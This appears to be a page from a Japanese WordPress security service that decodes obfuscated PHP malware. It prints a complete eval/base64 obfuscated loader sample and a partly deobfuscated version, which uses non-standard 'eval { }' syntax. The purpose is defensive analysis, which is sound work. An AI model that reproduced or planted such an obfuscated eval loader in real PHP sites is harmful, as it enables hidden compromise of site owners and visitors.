Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0[3].$O00OO0[6].$O00OO0[33].$O00OO0[30];$O0OO00=$O00OO0[33].$O00OO0[10].$O00OO0[24].$O00OO0[10].$O00OO0[24];$OO0O00=$O0OO00[0].$O00OO0[18].$O00OO0[3].$O0OO00[0].$O0OO00[1].$O00OO0[24];$OO0000=$O00OO0[7].$O00OO0[13];$O00O0O.=$O00OO0[22].$O00OO0[36].$O00OO0[29].$O00OO0[26].$O00OO0[30].$O00OO0[32].$O00OO0[35].$O00OO0[26].$O00OO0[30];eval($O00O0O("JE8wTzAwMD0iSWhCYWN4WW9qVGJ3V2lIbk1tWnlsUmVWRnByVUNrZHRQcUx1U3NmRVFLZ0R6QU9KWE5HdkVXWWJ1dmpUQ2FLcmx4bml5a1ZGbVhRZHdnaHBjZk9HTW9VcUxQQmVJc05KU3RaekhBRFJNSjlyYm50c2Jsak5zY1hCcDBkTGRmZExsRk9MWGR3ZFhkQXBIMDF3ZGVXTVhjT09FSjA5TUx0aXBlOWFkY3VnRW5Qc0VjdE5FblhGUUhQc0VjdE5FY3RORWN0ZmpsdlBLM09tVmN0Tk1MWUt6MlZndWlBMGFrd0dWTHVQejJ2V3UzWFpqbDFtekZyaWoyd0ZWZTUxS2x6bXV4dVB6MjFSS2lYVHpGcmlRbGRXdXh1UHoyQTJPeHVQejJBUk9sNTB1aWZpVWNPV1ZEWEZWSEFTekZyaXVEOVNPZUFSVkRwaVVjT0dqbG1QekZyaXVEV1JLa3BpSGFQc0VjdE5FY3RORWN0ZnVEd0ZqbDBOTUx0aXpTUHNFY3RORWN0TkVjWWtLM3ptamxBVEVjTmZqbHZQSzNPbVZjWVd1RnRmYjJkNXNMWTdjeHRORWN0TkVjdE5FY3RORWNYMmpsck5NTFlndTNBbU9jTmZIMVlNcDFYS3pER21RZDBnTUZYQnBlOWFkd1BmYjJkNUhhVGl6U1BzRWN0TkVjdE5FY3RORWN0TnpuWVd1a3dHRUowTnpuWVd1a3dHVXhYMmpscnF6MzRpWnJUTkVjdE5FY3RORW4wc0VjdE5FY3RORWN0Zk9IWTBLRnQ5RUR6V3UycDJBdzlmVmxBUlZEcFR6MHJTbGtXQ2JhZlNWSkFDT2t3RXBpWHhJU21obGR1MWJtZ0hMQ3diUWFtcmptT0NPa3puWmw1V2RTZGdsaWdBT2x3cUlrNGlzYVBzRWN0TkVjdE5FY1lrYmx2bUgzWTFPdzlDSzI1MFZsNTB1Rk5mT0hZMEtGck5qa3dTVmFqMEgyZHFqMjlmVkxXeGpIQW1BQ1hCVmw1Q0syWG1zY1hyakh6V0tMZmdVeHp1S3hFUEVlVnphZWRCSWRZSVhwNWVFbnJOYWU5SkwxOXdsY2Y3Y3h0TkVjdE5FY3ROVmxBVEtGTnh1M2RDajJkU3VGRWdaclRORWN0TkJJVE5FY3ROVmttcWpsdlBRSEc5Y2kwc01TND0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?>
<?php $O00OO0 = "n1zb/ma5\\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j"; $O00O0O = "base"; $O0OO00 = "strtr"; $OO0O00 = "substr"; $OO0000 = "52"; $O00O0O = "base64_decode"; eval { $O0O000 = "IhBacxYojTbwWiHnMmZylReVFprUCkdtPqLuSsfEQKgDzAOJXNGvEWYbuvjTCaKrlxniykVFmXQdwghpcfOGMoUqLPBeIsNJStZzHADRMJ9rbntsbljNscXBp0dLdfdLlFOLXdwdXdApH01wdeWMXcOOEJ09MLtipe9adcugEnPsEctNEnXFQHPsEctNEctNEctfjlvPK3OmVctNMLYKz2VguiA0akwGVLuPz2vWu3XZjl1mzFrij2wFVe51KlzmuxuPz21RKiXTzFriQldWuxuPz2A2OxuPz2AROl50uifiUcOWVDXFVHASzFriuD9SOeARVDpiUcOGjlmPzFriuDWRKkpiHaPsEctNEctNEctfuDwFjl0NMLtizSPsEctNEctNEcYkK3zmjlATEcNfjlvPK3OmVcYWuFtfb2d5sLY7cxtNEctNEctNEctNEcX2jlrNMLYgu3AmOcNfH1YMp1XKzDGmQd0gMFXBpe9adwPfb2d5HaTizSPsEctNEctNEctNEctNznYWukwGEJ0NznYWukwGUxX2jlrqz34iZrTNEctNEctNEn0sEctNEctNEctfOHY0KFt9EDzWu2p2Aw9fVlARVDpTz0rSlkWCbafSVJACOkwEpiXxISmhldu1bmgHLCwbQamrjmOCOkznZl5WdSdgligAOlwqIk4isaPsEctNEctNEcYkblvmH3Y1Ow9CK250Vl50uFNfOHY0KFrNjkwSVaj0H2dqj29fVLWxjHAmACXBVl5CK2XmscXrjHzWKLfgUxzuKxEPEeVzaedBIdYIXp5eEnrNae9JL19wlcf7cxtNEctNEctNVlATKFNxu3dCj2dSuFEgZrTNEctNBITNEctNVkmqjlvPQHG9ci0sMS4="; eval('?>' . base64_decode(strtr(substr($O0O000, 104), substr($O0O000, $OO0000, $OO0000), substr($O0O000, 0, $OO0000)))); };
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.